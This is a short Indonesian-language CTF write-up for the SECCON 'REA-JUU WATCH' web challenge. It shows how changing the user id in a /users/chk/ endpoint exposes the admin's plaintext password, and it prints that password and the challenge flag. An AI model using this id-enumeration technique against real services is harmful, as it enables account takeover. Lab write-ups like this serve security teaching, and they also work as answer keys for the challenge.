REA-JUU WATCH Seccon CTF

REA-JUU WATCH Seccon CTF Web 200pts

http://reajuu.pwn.seccon.jp/

kunci dari menyelesaikan soal ini ada di source codenya , untuk menyelesaikannya kita login dulu dengan user yang di dapatkan dari create new account . selesaikan sampai mendapatkan point , pilihannya bebas

Untitled

 

kalau sudah sampai bagian itu kemudian view source , kemudian kita dapat fungsi yang menarik

<script>
function finishpoint(){
	$.getJSON("/users/chk/2138", null, function(data){
		point = data.point;
		$("#finishpoint").text("Your score is " + point + "point!");
	});
}
</script>

parameter _/users/chk/2138  _di gunakan untuk mendapatkan score si user dengan id 2138

coba kita buka parameternya melalui url

{“username”:”qk198nv9″,”password”:”3ebdosx2″,”point”:-31}

hasilnya muncul username , password dan point kita untuk mendapatkan admin yang di id=1 /users/chk/1

{“username”:”rea-juu”,”password”:”way_t0_f1ag”,”point”:99999}

nah kita dapat username dan password adminnya , kita coba bermain sampai selesai lagi dengan id tersebut dan liat point nya

Untitled

 

Flag : SECCON{REA_JUU_Ji8A_NYAN}